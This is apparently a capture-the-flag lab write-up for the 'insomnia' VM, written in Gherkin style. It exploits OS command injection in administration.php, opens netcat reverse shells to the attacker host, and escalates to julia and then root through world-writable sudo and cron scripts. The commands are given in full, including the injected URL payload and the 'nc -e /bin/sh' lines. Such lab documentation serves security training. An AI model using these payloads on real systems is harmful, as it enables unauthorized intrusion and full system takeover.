## Version 1.4.1
## language: en

Feature:
  TOE:
    insomnia
  Category:
    Improper Neutralization of Special Elements used in a Command
    ('Command Injection')
  Location:
    http://192.168.103.5:8080/administration.php
  CWE:
    CWE-78: Improper Neutralization of Special Elements used in an OS Command
    ('OS Command Injection')
  Rule:
    REQ.173: https://fluidattacks.com/products/rules/list/173
  Goal:
    Get remote connection and root privileges
  Recommendation:
    It’d better omit all the harmful input which can allow an attacker execute
    commands inside the system

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | netcat                     | 1.10     |
    | Nmap                       | 7.91     |
    | arjun                      | 2.12.0   |
    | Gobuster                   | 3.0.1    |

  TOE information:
    Given a .OVA file
    When I saw its extension
    Then I executed it on virtualbox
    Then I saw that the machine was running debian 10 [evidence](01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show vmnet8
    """
    And I got the next result
    """
    vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
    inet 192.168.103.1/29 brd 192.168.103.7 scope global vmnet8
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:8/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 192.168.103.0/29
    """
    And I got the next result
    """
    Nmap scan report for 192.168.103.1
    Host is up (0.00076s latency).
    Nmap scan report for 192.168.103.5
    Host is up (0.00043s latency).
    """
    Then I knew that 192.168.103.5 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -A 192.168.103.5
    """
    And I got the next result
    """
    PORT     STATE SERVICE VERSION
    8080/tcp open  http    PHP cli server 5.5 or later (PHP 7.3.19-1)
    |_http-title: Chat
    """
    Then I saw that port 8080 was used by HTTP with PHP in its version 7.3.19

  Scenario: Normal use case
    Given HTTP was working on port 8080
    Then I accessed to the main webpage on 192.168.103.5:8080 using browser
    And thus I could see it [evidence](02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't found out any wrong
    When I was analyzing the web server
    Then I decided to search possible hidden directories with gobuster
    Then I executed the below command
    """
    gobuster dir -u http://192.168.103.5:8080/ -w /usr/share/seclists/Discovery
    /Web-Content/raft-large-words.txt -x php,txt,html -s 200,204,301,302,307,401
     --exclude-length 2899
    """
    And thus I got the next output
    """
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.103.5:8080/
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/
    raft-large-words.txt
    [+] Negative Status codes:   404
    [+] Exclude Length:          2899
    [+] User Agent:              gobuster/3.1.0
    [+] Extensions:              php,txt,html
    [+] Timeout:                 10s
    ===============================================================
    2021/03/26 10:37:25 Starting gobuster in directory enumeration mode
    ===============================================================
    /chat.txt             (Status: 200) [Size: 507]
    /administration.php   (Status: 200) [Size: 65]
    /process.php          (Status: 200) [Size: 2]
    ===============================================================
    2021/03/26 10:41:14 Finished
    ===============================================================
    """
    Then I inspected the chat.txt file
    And there I saw that the chat log was stored
    Then I checked process.php but I didn't found anything
    Then I revised administration.php
    And there I found the following message [evidence](03.png)
    Then I analyzed the webpage using arjun
    """
    [*] Probing the target for stability
    [*] Analysing HTTP response for anamolies
    [*] Analysing HTTP response for potential parameter names
    [*] Logicforcing the URL endpoint
    [✓] name: logfile, factor: body length
    """
    And thus I saw that the webpage used logfile as parameter
    Then I tried executing the command below
    """
    http://192.168.103.5:8080/administration.php?logfile=cd /;ls -l
    """
    Then I got the next output in the main webpage [evidence](04.png)
    Then I realized that I could execute the most of commands
    Then I put the port 4444 in listening mode using netcat

  Scenario: Exploitation
    Given previously I'd put the port 4444 in listening mode
    Then I executed the next command
    """
    http://192.168.103.5:8080/administration.php?logfile=cd /;
    nc 192.168.103.1 4444 -e /bin/sh
    """
    And in that way I got remote connection [evidence](05.png)
    Then I listed the files in the directory
    """
    -rw-r--r-- 1 www-data www-data  426 Dec 21 11:00 administration.php
    -rw-r--r-- 1 www-data www-data 1610 Dec 20 18:46 chat.js
    -rw-r--r-- 1 www-data www-data    0 Mar 26 15:00 chat.txt
    drwxr-xr-x 2 www-data www-data 4096 Dec 20 18:57 images
    -rw-r--r-- 1 www-data www-data 2899 Dec 21 05:25 index.php
    -rw-r--r-- 1 www-data www-data 1684 Dec 20 11:29 process.php
    -rwxrwxrwx 1 root     root        8 Mar 26 15:01 start.sh
    -rw-r--r-- 1 www-data www-data 1363 Dec 20 18:40 style.css
    """
    Then I noted that start.sh was a file which belonged to the root user
    And any user could modified and executed it
    Then I visualized my permissions
    """
    sudo --list
    Matching Defaults entries for www-data on insomnia:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\
    :/bin
    User www-data may run the following commands on insomnia:
    (julia) NOPASSWD: /bin/bash /var/www/html/start.sh
    """
    Then I inspected the start.sh file
    """
    php -S 0.0.0.0:8080
    """
    Then I modified that file with information below
    """
    /bin/sh
    """
    Then I executed the following command
    """
    sudo -u julia /bin/bash /var/www/html/start.sh
    """
    And thus I got the julia privileges
    Then I listed the files the julia's home directory
    """
    drwxrwxr-x 3 julia julia 4096 Dec 21 04:11 .
    drwxr-xr-x 3 root  root  4096 Dec 15 13:55 ..
    -rw------- 1 julia julia  379 Dec 21 04:16 .bash_history
    -rw-r--r-- 1 julia julia  220 Nov 30 14:46 .bash_logout
    -rw-r--r-- 1 julia julia 3526 Nov 30 14:46 .bashrc
    drwxr-xr-x 3 julia julia 4096 Dec 21 04:11 .local
    -rw-r--r-- 1 julia julia  807 Nov 30 14:46 .profile
    -rw-r--r-- 1 julia julia   86 Dec 15 14:36 user.txt
    """
    Then I visualized the user.txt file
    And there I saw the message below
    """
    ~~~~~~~~~~~~~\
    USER INSOMNIA
    ~~~~~~~~~~~~~
    Flag : [c2e285cb33cecdbeb83d2189e983a8c0]
    """
    Then I noted that the flag had a md5 format
    Then I accessed to the next web site
    """
    https://www.md5online.org/md5-decrypt.html
    """
    Then I decode the message
    And I saw that the decoded message was julia
    Then I tried executing a command as the root user
    Then it requested me a password
    And I typed the decoded message as password
    And it didn't work
    Then I inspected the .bash_history file
    """
    cat /etc/passwd
    passwd
    sudo passwd
    exit
    cd
    ls
    cat user.txt
    ls
    cd /var/cron
    ls
    nano chech.sh
    export TERM=xterm
    nano check.sh
    echo "nc -e /bin/bash 10.0.2.13 4444" >> check.sh
    exit
    """
    Then I noted that someone'd accessed to the /var/cron directory
    Then I accessed to that directory
    And there I found the following file
    """
    -rwxrwxrwx 1 root root 153 Dec 21 04:17 check.sh
    """
    Then I noted that it was a file which belonged to the root user
    And any user could executed or modified
    Then I inspected its Content
    """
    #!/bin/bash
    status=$(systemctl is-active insomnia.service)
    if [ "$status" == "active"  ]; then
    echo "OK"
    else
    systemctl start  insomnia.service
    fi
    """
    And I executed it
    Then I got the response below
    """
    julia@insomnia:/var/cron$ ./check.sh
    ./check.sh
    OK
    """
    Then I read about cron
    And I found that it's a daemon which execute recurring task
    And it must be executed by the root user
    Then I modified that file in the next way
    """
    #!/bin/bash
    status=$(systemctl is-active insomnia.service)
    if [ "$status" == "active"  ]; then
    nc -e  /bin/sh 192.168.103.1 5555
    else
    systemctl start  insomnia.service
    fi
    """
    And I put the port 5555 in listening mode using netcat with the command
    """
    nc -lnvp 5555
    """
    Then I waited while the script was executed one more time
    And thus I got the root privileges [evidence](06.png)
    Then I listed the files in that directory
    """
    drwx------  5 root root 4096 Dec 21 04:19 .
    drwxr-xr-x 18 root root 4096 Dec 21 03:27 ..
    -rw-------  1 root root 1431 Dec 21 11:19 .bash_history
    -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
    drwxr-xr-x  3 root root 4096 Dec 17 06:57 .cache
    drwx------  3 root root 4096 Dec 17 07:16 .gnupg
    drwxr-xr-x  3 root root 4096 Nov 30 15:02 .local
    -rw-r--r--  1 root root  148 Aug 17  2015 .profile
    -rw-------  1 root root  112 Dec 15 14:33 root.txt
    """
    Then I visualized the root.txt file
    And I got the following message
    """
    ~~~~~~~~~~~~~~~\
    ROOTED INSOMNIA
    ~~~~~~~~~~~~~~~
    Flag : [c84baebe0faa2fcdc2f1a4a9f6e2fbfc]
    """
    And thus I solved the challenge [evidence](07.png)

  Scenario: Remediation
    Given the system vulnerable to a remote code execution attack
    And it's possible to execute command inside the system
    And some users can execute functions as a privileged user
    Then it'd better disable all the harmful inputs to avoid executing commands
    And thus it doesn't allow an attacker to get remote connection
    And assign user privileges in a better way

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.8/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.7/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.9/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-03-26
